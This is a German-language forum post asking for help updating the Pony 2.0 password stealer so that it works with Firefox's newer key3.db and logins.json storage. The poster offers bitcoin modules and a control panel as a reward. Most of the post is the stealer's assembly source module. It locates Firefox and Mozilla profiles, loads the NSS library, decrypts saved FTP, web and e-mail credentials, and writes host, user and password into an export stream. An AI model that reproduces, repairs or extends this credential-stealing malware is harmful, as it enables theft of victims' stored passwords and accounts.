Anmelden
Benutzerkonto erstellen
Hi, wie es scheint funktioniert seit einigen Tagen Pony 2.0 nicht mehr mit der neusten Firefox version, da diese ihr Speicherungsmechanismus geändert haben. Damals habe ich das selbst gemacht und einpach paar Pfade geändert, heute ist es schon schwerer.. und ich kenne mich mit ASM nicht wirklich aus.
Es handelt sich um diese Stelle im Code, zum entschlüsseln der Firefox Passwörter. Seit neuem speichert firefox die passwörter in 2 dateien, key3.db und logins.json . Was man da jetzt im Code genau ändern muss weiß ich nicht..
Und bitte, ich weiß, dass es aktuelle Stealer da draußen gibt, aber es gibt keines der sich mit Pony messen kann.
Falls es jemand schafft und das gratis, lade ich hier meine bitcoin modi für pony 2.0 hoch + panel auf deutsch/englisch von mir..
; Mozilla products common password decryption
; SFTP: not supported
IFDEF COMPILE_MOZILLA_CODE
.data
szNSS3Imports db 'nss3.dll',0
db 'NSS_Init',0
db 'NSS_Shutdown',0
db 'NSSBase64_DecodeBuffer',0
db 'SECITEM_FreeItem',0
db 'PK11_GetInternalKeySlot',0
db 'PK11_Authenticate',0
db 'PK11SDR_Decrypt',0
db 'PK11_FreeSlot',0
db 0
NSS_Init dd 0
NSS_Shutdown dd 0
NSSBase64_DecodeBuffer dd 0
SECITEM_FreeItem dd 0
PK11_GetInternalKeySlot dd 0
PK11_Authenticate dd 0
PK11SDR_Decrypt dd 0
PK11_FreeSlot dd 0
MOZILLA_MODE_FTP_HTTP equ 0
MOZILLA_MODE_FIREFTP equ 1
MOZILLA_MODE_EMAIL equ 2
MOZILLA_MODE_EMAIL_CONFIG equ 3
mozilla_mode dd 0 ; 0 - FTP/HTTP; 1 - FireFTP; 2 - E-mail
mozilla_slot dd 0
szMozillaProfileIni db 'profiles.ini',0
szMozillaProfile db 'Profile',0
szMozillaIniIsRelative db 'IsRelative',0
szMozillaIniPath db 'Path',0
szMozillaPathToExe db 'PathToExe',0
szMozillaPrefsJS db 'prefs.js',0
szMozillaSQLiteFile db 'signons.sqlite',0
szMozillaSignons db 'signons.txt',0
szMozillaSignons2 db 'signons2.txt',0
szMozillaSignons3 db 'signons3.txt',0
szMozillaSignonsID db '#2c',0
szMozillaSignonsID2 db '#2d',0
szMozillaSignonsID3 db '#2e',0
szMozillaFirefox db 'Firefox',0
szMozillaFirefoxBaseRegPath db '\Mozilla\Firefox\',0
szMozillaBaseRegPath db 'Software\Mozilla',0
szMozillaDashes db '---',0
szMozillaFTP db 'ftp://',0
IFDEF GRAB_HTTP
szMozillaHTTP db 'http://',0
szMozillaHTTPS db 'https://',0
ENDIF
szMozillaFireFTP db 'ftp.',0
.code
MozillaInitNSSDecryption proc uses ebx szProfilePath, szAppPath
mov mozilla_slot, 0
sub ebx, ebx
invoke lstrlen, szProfilePath
mov edx, szProfilePath
.IF eax > 2
add edx, eax
sub edx, 2
.IF word ptr[edx] == '\\'
mov word ptr[edx], '\'
.ENDIF
.ENDIF
invoke SetCurrentDirectory, szAppPath
invoke LoadDllImports, offset szNSS3Imports, offset NSS_Init
.IF eax
push szProfilePath
call NSS_Init
add esp, 4*1
.IF !eax
call PK11_GetInternalKeySlot
mov mozilla_slot, eax
.IF !mozilla_slot
call NSS_Shutdown
.ELSE
push NULL
push TRUE
push mozilla_slot
call PK11_Authenticate
add esp, 4*3
.IF eax
; authentication failed
push mozilla_slot
call PK11_FreeSlot
add esp, 4*1
call NSS_Shutdown
mov mozilla_slot, 0
.ELSE
; success!
inc ebx
.ENDIF
.ENDIF
.ENDIF
.ENDIF
mov eax, ebx
ret
MozillaInitNSSDecryption endp
MozillaFinalNSSDecryption proc
.IF mozilla_slot
push mozilla_slot
call PK11_FreeSlot
add esp, 4*1
call NSS_Shutdown
mov mozilla_slot, 0
.ENDIF
ret
MozillaFinalNSSDecryption endp
MozillaNSSDecryptPassword proc uses ebx szPassword, dwDataLen
LOCAL EncryptedSECItem: DWORD
LOCAL DecryptedSECItem[12]: BYTE
mov eax, szPassword
.IF !eax || !dwDataLen || !byte ptr[eax]
sub eax, eax
ret
.ENDIF
.IF byte ptr[eax] != '~' && !mozilla_slot
sub eax, eax
ret
.ENDIF
.IF byte ptr[eax] == '~'
mov edx, dwDataLen
dec edx
and edx, 3
.IF edx || dwDataLen == 1
sub eax, eax
.ELSE
dec dwDataLen
mov eax, dwDataLen
add eax, 1024
shl eax, 2
invoke MemAlloc, eax
push eax
mov edx, szPassword
inc edx
invoke Base64Decode, edx, dwDataLen, eax
pop eax
.ENDIF
ret
.ENDIF
sub ebx, ebx
push dwDataLen
push szPassword
push NULL
push NULL
call NSSBase64_DecodeBuffer
add esp, 4*4
.IF eax
mov EncryptedSECItem, eax
invoke ZeroMemory, addr DecryptedSECItem, 12
push NULL
lea eax, DecryptedSECItem
push eax
push EncryptedSECItem
call PK11SDR_Decrypt
add esp, 4*3
.IF !eax
lea eax, DecryptedSECItem
.IF dword ptr[eax+4*1]
mov eax, dword ptr[eax+4*2]
inc eax
invoke MemAlloc, eax
mov ebx, eax
lea eax, DecryptedSECItem
invoke MoveMem, dword ptr[eax+4*1], ebx, dword ptr[eax+4*2]
.ENDIF
push 0
lea eax, DecryptedSECItem
push eax
call SECITEM_FreeItem
add esp, 4*2
.ENDIF
push 1
push EncryptedSECItem
call SECITEM_FreeItem
add esp, 4*2
.ENDIF
mov eax, ebx
ret
MozillaNSSDecryptPassword endp
ProcessMozillaSQLiteFile proto :DWORD, :DWORD, :DWORD
MozillaReadSQLFile proc stream, szSQLFile, szProfilePath, szAppPath
invoke FileExists, szSQLFile
.IF !eax
ret
.ENDIF
invoke IsFileAlreadyProcessed, szSQLFile
.IF eax
ret
.ENDIF
; Initialize NSS decryption subsystem
invoke MozillaInitNSSDecryption, szProfilePath, szAppPath
.IF !eax
ret
.ENDIF
; Process SQLite3 database using tiny db engine
invoke ProcessMozillaSQLiteFile, stream, szSQLFile, ITEMHDR_ID or 0
; Finalize NSS decryption subsystem
invoke MozillaFinalNSSDecryption
ret
MozillaReadSQLFile endp
MozillaRTrimLine proc uses ebx CurStr
invoke PonyStrCat, CurStr, NULL
mov ebx, eax
invoke lstrlen, ebx
.IF eax
add eax, ebx
dec eax
.WHILE eax >= ebx
.IF byte ptr[eax] == 0dh || byte ptr[eax] == 0ah
mov byte ptr[eax], 0
.ELSE
.BREAK
.ENDIF
dec eax
.ENDW
.ENDIF
mov eax, ebx
ret
MozillaRTrimLine endp
MozillaReadSignonsFile proc uses edi stream, szSignonsFile, szProfilePath, szAppPath
LOCAL map: MappedFile
LOCAL string_list: DWORD
LOCAL state: DWORD
LOCAL line1: DWORD
LOCAL line2: DWORD
LOCAL line3: DWORD
LOCAL line4: DWORD
LOCAL line5: DWORD
LOCAL file_ver: DWORD
LOCAL cur_line: DWORD
LOCAL user_line: DWORD
LOCAL pass_line: DWORD
LOCAL host_line: DWORD
LOCAL user: DWORD
LOCAL pass: DWORD
LOCAL is_old_ver: DWORD
invoke FileExists, szSignonsFile
.IF !eax
ret
.ENDIF
invoke IsFileAlreadyProcessed, szSignonsFile
.IF eax
ret
.ENDIF
; Initialize NSS decryption subsystem
invoke MozillaInitNSSDecryption, szProfilePath, szAppPath
invoke MapFile, szSignonsFile, addr map
.IF eax
invoke ProcessStringList, map.lpMem, map.dwFileSize
.IF eax
mov string_list, eax
mov edi, eax
.IF byte ptr[edi]
invoke MozillaRTrimLine, edi
mov file_ver, eax
; verify file version
invoke lstrcmp, offset szMozillaSignonsID, file_ver
push eax
invoke lstrcmp, offset szMozillaSignonsID2, file_ver
push eax
invoke lstrcmp, offset szMozillaSignonsID3, file_ver
pop edx
pop ecx
.IF !eax || !edx || !ecx
.IF !ecx
mov is_old_ver, 1
.ELSE
mov is_old_ver, 0
.ENDIF
; skip version line
@Next @F
@@:
; skip domains for which passwords are never saved
mov state, 0
@@:
.IF byte ptr[edi]
invoke MozillaRTrimLine, edi
mov cur_line, eax
.IF state == 0
invoke lstrcmp, cur_line, offset szFilePoint
.IF !eax
mov state, 1
.ENDIF
.ELSE
.IF state == 1
; host
mov line1, edi
mov state, 2
.ELSEIF state == 2
; user_input_name
mov line2, edi
mov state, 3
.ELSEIF state == 3
; encrypted user
mov line3, edi
mov state, 4
.ELSEIF state == 4
; password_input_name
mov line4, edi
mov state, 5
.ELSEIF state == 5
; encrypted password
mov line5, edi
.IF is_old_ver
; 5 lines
mov state, 2
.ELSE
mov state, 6
.ENDIF
mov host_line, 0
mov user_line, 0
mov pass_line, 0
mov user, 0
mov pass, 0
invoke MozillaRTrimLine, line1
mov host_line, eax
invoke MozillaRTrimLine, line3
mov user_line, eax
invoke MozillaRTrimLine, line5
mov pass_line, eax
.IF mozilla_mode == MOZILLA_MODE_FTP_HTTP
invoke lstrlen, offset szMozillaFTP
invoke StrCmpNI, host_line, offset szMozillaFTP, eax
IFDEF GRAB_HTTP
.IF eax
invoke lstrlen, offset szMozillaHTTP
invoke StrCmpNI, host_line, offset szMozillaHTTP, eax
.ENDIF
.IF eax
invoke lstrlen, offset szMozillaHTTPS
invoke StrCmpNI, host_line, offset szMozillaHTTPS, eax
.ENDIF
ENDIF
.ELSEIF mozilla_mode == MOZILLA_MODE_FIREFTP
invoke lstrlen, offset szMozillaFireFTP
invoke StrCmpNI, host_line, offset szMozillaFireFTP, eax
.ELSE
sub eax, eax ; allow all mailboxes
.ENDIF
.IF !eax
; user
invoke lstrlen, user_line
invoke MozillaNSSDecryptPassword, user_line, eax
mov user, eax
; pass
invoke lstrlen, pass_line
invoke MozillaNSSDecryptPassword, pass_line, eax
mov pass, eax
.IF host_line && pass
; export recovered data
invoke StreamWriteDWORD, stream, ITEMHDR_ID or 0
invoke StreamWriteString, stream, host_line
invoke StreamWriteString, stream, user
invoke StreamWriteString, stream, pass
.ENDIF
.ENDIF
invoke MemFree, host_line
invoke MemFree, user_line
invoke MemFree, pass_line
invoke MemFree, user
invoke MemFree, pass
.ELSEIF state == 6
; target host in newer versions
mov state, 2
.ENDIF
.IF state != 0
invoke lstrcmp, cur_line, offset szFilePoint
.IF !eax
; new site
mov state, 1
.ENDIF
invoke lstrcmp, cur_line, offset szMozillaDashes
.IF !eax
; used in newer versions only
mov state, 2
.ENDIF
.ENDIF
.ENDIF
invoke MemFree, cur_line
@Next @B
.ENDIF
.ENDIF
invoke MemFree, file_ver
.ENDIF
invoke MemFree, string_list
.ENDIF
invoke UnmapFile, addr map
.ENDIF
; Finalize NSS decryption subsystem
invoke MozillaFinalNSSDecryption
ret
MozillaReadSignonsFile endp
MozillaCommonFileScan proc stream, szProfilePath, szAppPath, dir
LOCAL FindFileData: WIN32_FIND_DATA
LOCAL hFind: DWORD
LOCAL path: DWORD
LOCAL ininame: DWORD
mov path, 0
mov eax, dir
.IF (!eax) || (!byte ptr[eax])
jmp @not_found
.ENDIF
invoke CheckEndSlash, dir
.IF !eax
invoke PonyStrCat, dir, offset CCommonFileMask
.ELSE
invoke PonyStrCat, dir, offset CCommonFileMaskNoSlash
.ENDIF
mov path, eax
invoke ZeroMemory, addr FindFileData, sizeof WIN32_FIND_DATA
invoke FindFirstFile, path, addr FindFileData
mov hFind, eax
inc eax
jz @not_found
@find_loop:
lea edx, FindFileData
test [edx].WIN32_FIND_DATA.dwFileAttributes, FILE_ATTRIBUTE_DIRECTORY
.IF !ZERO?
; is directory, scan recursively
; skip "." and ".." path names
lea eax, [edx].WIN32_FIND_DATA.cFileName
invoke lstrcmpi, offset szFilePoint, eax
.IF !eax
jmp @skip
.ENDIF
lea edx, FindFileData
lea eax, [edx].WIN32_FIND_DATA.cFileName
invoke lstrcmpi, offset szFilePPoint, eax
.IF !eax
jmp @skip
.ENDIF
invoke CheckEndSlash, dir
.IF !eax
invoke PonyStrCat, dir, offset szSlash
.ELSE
invoke PonyStrCat, dir, NULL
.ENDIF
lea edx, FindFileData
lea edx, [edx].WIN32_FIND_DATA.cFileName
invoke PonyStrCatFreeArg1, eax, edx
push eax
invoke MozillaCommonFileScan, stream, szProfilePath, szAppPath, eax
call MemFree
jmp @skip
.ENDIF
lea eax, [edx].WIN32_FIND_DATA.cFileName
mov ininame, eax
; E-mail config files, do not process any other files
.IF mozilla_mode == MOZILLA_MODE_EMAIL_CONFIG
invoke StrStrI, ininame, offset szMozillaPrefsJS
.IF eax
invoke PonyStrCat, dir, offset szSlash
invoke PonyStrCatFreeArg1, eax, ininame
push eax
invoke CommonAppendFile, stream, eax, ITEMHDR_ID or 1
call MemFree
.ENDIF
jmp @skip
.ENDIF
; Newer signons.sqlite files
invoke StrStrI, ininame, offset szMozillaSQLiteFile
.IF eax
invoke PonyStrCat, dir, offset szSlash
invoke PonyStrCatFreeArg1, eax, ininame
push eax
invoke MozillaReadSQLFile, stream, eax, szProfilePath, szAppPath
call MemFree
.ENDIF
; Mozilla *.s files
invoke lstrlen, ininame
.IF eax >= 2
mov edx, ininame
add edx, eax
sub edx, 2
.IF word ptr[edx] == 's.'
jmp @process_file
.ENDIF
.ENDIF
; Firefox signonsN.txt files
invoke StrStrI, ininame, offset szMozillaSignons
push eax
invoke StrStrI, ininame, offset szMozillaSignons2
push eax
invoke StrStrI, ininame, offset szMozillaSignons3
pop edx
pop ecx
.IF eax || edx || ecx
@process_file:
invoke PonyStrCat, dir, offset szSlash
invoke PonyStrCatFreeArg1, eax, ininame
push eax
invoke MozillaReadSignonsFile, stream, eax, szProfilePath, szAppPath
call MemFree
.ENDIF
@skip:
invoke FindNextFile, hFind, addr FindFileData
test eax, eax
jnz @find_loop
invoke FindClose, hFind
@not_found:
invoke MemFree, path
ret
MozillaCommonFileScan endp
MozillaFindPasswordFiles proc stream, szBaseProfilePath, szAppPath
invoke MozillaCommonFileScan, stream, szBaseProfilePath, szAppPath, szBaseProfilePath
ret
MozillaFindPasswordFiles endp
MozillaScanProfiles proc uses edi stream, szBaseProfilePath, szAppPath
LOCAL prof_lines: DWORD
LOCAL prof_path: DWORD
LOCAL prof_base_path: DWORD
LOCAL prof_target_path: DWORD
invoke DirectoryExists, szBaseProfilePath
.IF !eax
ret
.ENDIF
invoke DirectoryExists, szAppPath
.IF !eax
ret
.ENDIF
invoke CheckEndSlash, szBaseProfilePath
.IF !eax
invoke PonyStrCat, szBaseProfilePath, offset szSlash
.ELSE
invoke PonyStrCat, szBaseProfilePath, NULL
.ENDIF
mov prof_base_path, eax
invoke PonyStrCat, prof_base_path, offset szMozillaProfileIni
mov prof_path, eax
invoke MemAlloc, 65002
mov prof_lines, eax
invoke MemAlloc, 4096
mov prof_target_path, eax
invoke FileExists, prof_path
.IF eax
invoke GetPrivateProfileSectionNames, prof_lines, 65000, prof_path
.IF eax > 2
mov edi, prof_lines
.IF byte ptr[edi]
@@:
invoke StrStrI, edi, offset szMozillaProfile
.IF eax
invoke GetPrivateProfileString, edi, offset szMozillaIniPath, offset szNULL, prof_target_path, 4095, prof_path
.IF eax
invoke GetPrivateProfileInt, edi, offset szMozillaIniIsRelative, 1, prof_path
.IF eax == 1
; Relative profile path
invoke PonyStrCat, prof_base_path, prof_target_path
push eax
; Fix path slashes
mov edx, eax
.WHILE edx && byte ptr[edx]
.IF byte ptr[edx] == '/'
mov byte ptr[edx], '\'
.ENDIF
inc edx
.ENDW
invoke MozillaFindPasswordFiles, stream, eax, szAppPath
call MemFree
.ELSE
; Absolute profile path
invoke MozillaFindPasswordFiles, stream, prof_target_path, szAppPath
.ENDIF
.ENDIF
.ENDIF
@Next @B
.ENDIF
.ENDIF
.ENDIF
invoke MemFree, prof_base_path
invoke MemFree, prof_target_path
invoke MemFree, prof_path
invoke MemFree, prof_lines
invoke MozillaFindPasswordFiles, stream, szBaseProfilePath, szAppPath
ret
MozillaScanProfiles endp
MozillaScanRegProfilePaths proc stream, hKey, szBaseRegPath, szAppName, szFolder
LOCAL hkHandle: DWORD
LOCAL KeyStr: DWORD
LOCAL dwBufLen: DWORD
LOCAL KeyIndex: DWORD
LOCAL NewRegPath: DWORD
LOCAL AppPath: DWORD
invoke StrStrI, szBaseRegPath, szAppName
.IF eax
invoke RegReadValueStr, hKey, szBaseRegPath, offset szMozillaPathToExe, NULL
.IF eax
push eax
invoke ExtractFilePath, eax
.IF eax
mov AppPath, eax
invoke SHGetFolderPathStr, CSIDL_APPDATA
.IF eax
invoke PonyStrCatFreeArg1, eax, szFolder
push eax
invoke MozillaScanProfiles, stream, eax, AppPath
call MemFree
.ENDIF
invoke MemFree, AppPath
.ENDIF
call MemFree
.ENDIF
.ENDIF
invoke MemAlloc, 2048
mov KeyStr, eax
invoke RegOpenKey, hKey, szBaseRegPath, addr hkHandle
.IF eax == ERROR_SUCCESS
mov KeyIndex, 0
.WHILE TRUE
mov dwBufLen, 2047
invoke RegEnumKeyEx, hkHandle, KeyIndex, KeyStr, addr dwBufLen, NULL, NULL, NULL, NULL
.IF eax
.BREAK
.ENDIF
; BaseRegPath + '\' + KeyStr
invoke PonyStrCat, szBaseRegPath, addr szSlash
invoke PonyStrCatFreeArg1, eax, KeyStr
mov NewRegPath, eax
; recursively scan subfolders
invoke MozillaScanRegProfilePaths, stream, hKey, NewRegPath, szAppName, szFolder
invoke MemFree, NewRegPath
inc KeyIndex
.ENDW
invoke RegCloseKey, hkHandle
.ENDIF
invoke MemFree, KeyStr
ret
MozillaScanRegProfilePaths endp
ENDIF
Nach oben
Melden
Suchanfragen
Hilfe / Fragen / Unterstützung
Tool Area
